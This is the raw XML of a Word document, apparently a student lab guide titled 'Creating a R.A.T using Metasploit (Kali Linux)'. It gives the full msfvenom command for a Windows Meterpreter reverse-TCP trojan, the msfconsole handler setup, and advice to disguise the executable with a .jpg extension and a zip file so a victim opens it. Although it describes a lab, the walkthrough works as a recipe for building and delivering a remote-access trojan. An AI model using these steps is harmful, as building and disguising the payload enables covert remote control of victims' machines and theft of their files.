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855277A" w14:textId="77777777" w:rsidR="00281880" w:rsidRDefault="00281880">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E0C4502" w14:textId="193A2EE6" w:rsidR="00281880" w:rsidRPr="00D34824" w:rsidRDefault="00D34824">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D34824">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00355D64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> documentation will simulate</w:t>
      </w:r>
      <w:r w:rsidRPr="00D34824">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the Metasploit Framework, with msfvenom to create a payload and msfconsole to configure the listener, showing how a trojan file can establish remote access in a controlled lab environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A1FC7D" w14:textId="4D9A71D4" w:rsidR="009C7920" w:rsidRDefault="0025683A">
      <w:r w:rsidRPr="0025683A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34320EDD" wp14:editId="38C5A183">
            <wp:extent cx="4910138" cy="2400935"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="1946821731" name="Picture 1" descr="A computer screen shot of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821731" name="Picture 1" descr="A computer screen shot of text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913319" cy="2402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A2614" w14:textId="5581989E" w:rsidR="009C7920" w:rsidRDefault="00704525">
      <w:r>
        <w:t xml:space="preserve">On your kali linux vm go into the terminal and type msfvenom. This will be the technique </w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t xml:space="preserve">used </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t>create</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t>exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF280F3" w14:textId="77777777" w:rsidR="00D34824" w:rsidRDefault="00D34824"/>
    <w:p w14:paraId="3D8B91FB" w14:textId="26F8CE19" w:rsidR="009C7920" w:rsidRDefault="00D34824">
      <w:r w:rsidRPr="009C7920">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="082AA6A0" wp14:editId="5724EFDD">
            <wp:extent cx="4357370" cy="2787135"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="932794378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794378" name="Picture 1" descr="A screenshot of a computer screen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393670" cy="2810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7611F" w14:textId="1FD481E0" w:rsidR="00B91120" w:rsidRPr="00B91120" w:rsidRDefault="00704525" w:rsidP="00B91120">
      <w:r>
        <w:t xml:space="preserve">Use the command </w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>msfvenom -l payload</w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and there you will look for the directory windows/meterpreter/reverse_tcp. </w:t>
      </w:r>
      <w:r w:rsidR="00B91120" w:rsidRPr="00B91120">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00B91120">
        <w:t>his directory</w:t>
      </w:r>
      <w:r w:rsidR="00B91120" w:rsidRPr="00B91120">
        <w:t xml:space="preserve"> creates a Windows program </w:t>
      </w:r>
      <w:r w:rsidR="00B91120">
        <w:t>that will</w:t>
      </w:r>
      <w:r w:rsidR="00B91120" w:rsidRPr="00B91120">
        <w:t xml:space="preserve"> connect back to the attacker’s computer over TCP. This gives the attacker a hidden remote shell to control the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4F3B26" w14:textId="77777777" w:rsidR="00704525" w:rsidRDefault="00704525"/>
    <w:p w14:paraId="65CEF1A1" w14:textId="4825A8E1" w:rsidR="00704525" w:rsidRDefault="0025683A" w:rsidP="00704525">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="0025683A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67CC99E0" wp14:editId="4EBFDEA5">
            <wp:extent cx="5943600" cy="2315845"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="2902423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24234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F0EE9" w14:textId="511CA26A" w:rsidR="009C7920" w:rsidRDefault="00704525" w:rsidP="00704525">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After finding the directory type the command, “msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;IP&gt; LPORT=4444 -f exe -o </w:t>
      </w:r>
      <w:r w:rsidR="00B91120">
        <w:t>happy</w:t>
      </w:r>
      <w:r>
        <w:t>.exe” This will create the trojan and add the exe in the folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF1E2CA" w14:textId="67474EB6" w:rsidR="00B91120" w:rsidRDefault="00B91120" w:rsidP="00704525">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B91120">
        <w:t>It’s important to rename the file with a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> valid</w:t>
      </w:r>
      <w:r w:rsidRPr="00B91120">
        <w:t xml:space="preserve"> extension (</w:t>
      </w:r>
      <w:r>
        <w:t>jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="00B91120">
        <w:t xml:space="preserve">) so it appears less suspicious, since Windows </w:t>
      </w:r>
      <w:r>
        <w:t>usually</w:t>
      </w:r>
      <w:r w:rsidRPr="00B91120">
        <w:t xml:space="preserve"> hides th</w:t>
      </w:r>
      <w:r w:rsidR="00355D64">
        <w:t>e extension</w:t>
      </w:r>
      <w:r w:rsidRPr="00B91120">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD85F74" w14:textId="5C32FB31" w:rsidR="00A81FBD" w:rsidRPr="00A81FBD" w:rsidRDefault="00A81FBD" w:rsidP="00704525">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81FBD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>**For this process make sure to add the exe in a zip file</w:t>
      </w:r>
      <w:r w:rsidR="00355D64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3B6225" w14:textId="77777777" w:rsidR="00704525" w:rsidRDefault="00704525"/>
    <w:p w14:paraId="2BC83F1B" w14:textId="2DCB0023" w:rsidR="009C7920" w:rsidRDefault="0025683A">
      <w:r w:rsidRPr="0025683A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FD0FF4D" wp14:editId="11854124">
            <wp:extent cx="3417030" cy="1804988"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="14217463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74632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427942" cy="1810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5D547" w14:textId="156865CE" w:rsidR="00704525" w:rsidRDefault="00355D64" w:rsidP="00355D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00355D64">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The trojan is now created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D2A7B0" w14:textId="1CE80ADC" w:rsidR="009C7920" w:rsidRDefault="009C7920">
      <w:r w:rsidRPr="009C7920">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CF550EC" wp14:editId="5A24BAD5">
            <wp:extent cx="4400550" cy="3277632"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="71860242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602423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17814" cy="3290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2B212" w14:textId="68C33AEC" w:rsidR="009C7920" w:rsidRDefault="00281880" w:rsidP="00355D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To create a listener for the payload when executed</w:t>
      </w:r>
      <w:r w:rsidR="00B91120">
        <w:t xml:space="preserve"> us</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00B91120">
        <w:t xml:space="preserve"> the msfconsole command.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> M</w:t>
      </w:r>
      <w:r w:rsidRPr="00281880">
        <w:t xml:space="preserve">sfconsole is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a CLI </w:t>
      </w:r>
      <w:r w:rsidRPr="00281880">
        <w:t>of the Metasploit Framework</w:t>
      </w:r>
      <w:r>
        <w:t>. It is used</w:t>
      </w:r>
      <w:r w:rsidRPr="00281880">
        <w:t xml:space="preserve"> to configure exploits, payloads, and handlers for penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EAB386" w14:textId="77777777" w:rsidR="00A81FBD" w:rsidRDefault="00A81FBD"/>
    <w:p w14:paraId="1BC45FFE" w14:textId="77777777" w:rsidR="00704525" w:rsidRDefault="00704525"/>
    <w:p w14:paraId="16BAF2B5" w14:textId="6161D0DB" w:rsidR="009C7920" w:rsidRDefault="009C7920">
      <w:r w:rsidRPr="009C7920">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00965BEC" wp14:editId="781D0281">
            <wp:extent cx="5867443" cy="1819288"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1564718720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718720" name="Picture 1" descr="A screenshot of a computer screen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867443" cy="1819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4A5AB" w14:textId="77777777" w:rsidR="00D34824" w:rsidRDefault="00A81FBD" w:rsidP="00D34824">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>After starting the console type, “use</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81FBD">
        <w:t xml:space="preserve"> exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:t>.”</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81FBD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>This module</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81FBD">
        <w:t xml:space="preserve"> acts as a listener for incoming sessions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A389E1" w14:textId="77777777" w:rsidR="00D34824" w:rsidRDefault="00D34824" w:rsidP="00D34824">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the command “</w:t>
      </w:r>
      <w:r w:rsidR="00A81FBD" w:rsidRPr="00A81FBD">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00A81FBD" w:rsidRPr="00A81FBD">
        <w:t xml:space="preserve"> windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00A81FBD" w:rsidRPr="00A81FBD">
        <w:t xml:space="preserve">to match the one generated with msfvenom. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07314C" w14:textId="56F596B5" w:rsidR="009C7920" w:rsidRDefault="00A81FBD" w:rsidP="00D34824">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81FBD">
        <w:t>With this setup, the handler is ready to receive a reverse connection once the payload is executed on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0952C451" w14:textId="0F9991BE" w:rsidR="009C7920" w:rsidRDefault="0025683A">
      <w:r w:rsidRPr="0025683A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1178D0BC" wp14:editId="505C73C0">
            <wp:extent cx="5943600" cy="2106930"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="83652308" name="Picture 1" descr="A computer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52308" name="Picture 1" descr="A computer screen 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C9DB4" w14:textId="432C6B63" w:rsidR="009C7920" w:rsidRDefault="00D34824" w:rsidP="00D34824">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set the host to your </w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t>Ip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> using “set LHOST &lt;IP&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19037525" w14:textId="511E13A3" w:rsidR="00D34824" w:rsidRDefault="00D34824" w:rsidP="00D34824">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To make sure the IP is confirmed type options and there you will see the communication settings including the IP you typed to host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EA2137" w14:textId="77777777" w:rsidR="00281880" w:rsidRDefault="00281880" w:rsidP="00281880">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C26C47" w14:textId="77777777" w:rsidR="00B91120" w:rsidRDefault="00B91120"/>
    <w:p w14:paraId="73BD6786" w14:textId="420C8E87" w:rsidR="009C7920" w:rsidRDefault="0025683A">
      <w:r w:rsidRPr="0025683A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="76C4A1E3" wp14:editId="0F9C64C2">
            <wp:extent cx="5943600" cy="1571625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="885331800" name="Picture 1" descr="A computer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331800" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="93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71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A4F333" w14:textId="280558E0" w:rsidR="00355D64" w:rsidRDefault="00355D64" w:rsidP="00355D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00355D64">
        <w:t xml:space="preserve">When the victim runs the file, it </w:t>
      </w:r>
      <w:r>
        <w:t>starts</w:t>
      </w:r>
      <w:r w:rsidRPr="00355D64">
        <w:t xml:space="preserve"> a session back to the attacker, </w:t>
      </w:r>
      <w:r>
        <w:t>creating</w:t>
      </w:r>
      <w:r w:rsidRPr="00355D64">
        <w:t xml:space="preserve"> a reverse connection that allows remote access to the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A19BA4" w14:textId="77777777" w:rsidR="0025683A" w:rsidRDefault="0025683A"/>
    <w:p w14:paraId="3F91DAD6" w14:textId="1B0427D6" w:rsidR="0025683A" w:rsidRDefault="0025683A">
      <w:r w:rsidRPr="0025683A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0979044D" wp14:editId="4FF389E3">
            <wp:extent cx="5019117" cy="3695700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1492630368" name="Picture 1" descr="A screenshot of a computer progr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630368" name="Picture 1" descr="A screenshot of a computer program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28764" cy="3702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5FD2B" w14:textId="3B6C5FDB" w:rsidR="00D34824" w:rsidRDefault="00D34824" w:rsidP="00355D64">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Here is a screenshot where the attacker opens the system directory and </w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00281880">
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> all the user’s system files.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00D34824">
      <w:headerReference w:type="default" r:id="rId16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A458506" w14:textId="77777777" w:rsidR="006B5BA5" w:rsidRDefault="006B5BA5" w:rsidP="00704525">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="794153C0" w14:textId="77777777" w:rsidR="006B5BA5" w:rsidRDefault="006B5BA5" w:rsidP="0070452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A00239F" w14:textId="77777777" w:rsidR="006B5BA5" w:rsidRDefault="006B5BA5" w:rsidP="00704525">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="723DF403" w14:textId="77777777" w:rsidR="006B5BA5" w:rsidRDefault="006B5BA5" w:rsidP="0070452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BC0D5F7" w14:textId="79D0DC0E" w:rsidR="00704525" w:rsidRPr="00281880" w:rsidRDefault="00704525">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:tab/>
    </w:r>
    <w:r w:rsidRPr="00281880">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t xml:space="preserve">Creating a </w:t>
    </w:r>
    <w:r w:rsidR="00355D64">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>R.A.T</w:t>
    </w:r>
    <w:r w:rsidR="00A81FBD" w:rsidRPr="00281880">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t xml:space="preserve"> using </w:t>
    </w:r>
    <w:r w:rsidR="00281880" w:rsidRPr="00281880">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>Metasploit</w:t>
    </w:r>
    <w:r w:rsidRPr="00281880">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t xml:space="preserve"> (Kali Linux)</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7194E898" w14:textId="083495B1" w:rsidR="00281880" w:rsidRPr="00281880" w:rsidRDefault="00281880">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00281880">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:i/>
        <w:iCs/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28"/>
      </w:rPr>
      <w:t>By: Chance Debbs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E30F5A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CD636F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2093A28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2A004B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581240A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ACCF7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5E06F69"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="487058F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69574D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5460379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C2C046C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B29C94B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5446C02"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A128F8F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79E1CEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3ED0055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86463365">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="684793415">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2031493767">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="749353249">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="620841218">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1557005081">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1279220707">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="103175980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C7920"/>
    <w:rsid w:val="000324F5"/>
    <w:rsid w:val="000D220F"/>
    <w:rsid w:val="0025683A"/>
    <w:rsid w:val="00281880"/>
    <w:rsid w:val="00355D64"/>
    <w:rsid w:val="004F4C59"/>
    <w:rsid w:val="006B5BA5"/>
    <w:rsid w:val="00704525"/>
    <w:rsid w:val="008C747F"/>
    <w:rsid w:val="009A1D30"/>
    <w:rsid w:val="009C7920"/>
    <w:rsid w:val="00A81FBD"/>
    <w:rsid w:val="00B91120"/>
    <w:rsid w:val="00BE6CCF"/>
    <w:rsid w:val="00D34824"/>
    <w:rsid w:val="00D70B63"/>
    <w:rsid w:val="00E25B53"/>
    <w:rsid w:val="00EA12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7DE7874"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{55FB01DF-5B5C-42F9-9768-FAA2F324E38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C792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C792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C792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C792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C792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C792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C792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C792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C792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C792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9C792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C7920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C7920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C7920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C7920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C7920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C7920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C7920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C792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C792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C792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C792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C792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C7920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C792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C792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C792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C7920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C7920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70452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04525"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0070452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04525"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00B91120"/>
    <w:rPr>
      <w:rFonts w:ascii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header" Target="head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143</TotalTime>
  <Pages>5</Pages>
  <Words>328</Words>
  <Characters>1710</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>50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Chance Debbs</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chance Debbs</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-31T16:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-06T04:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>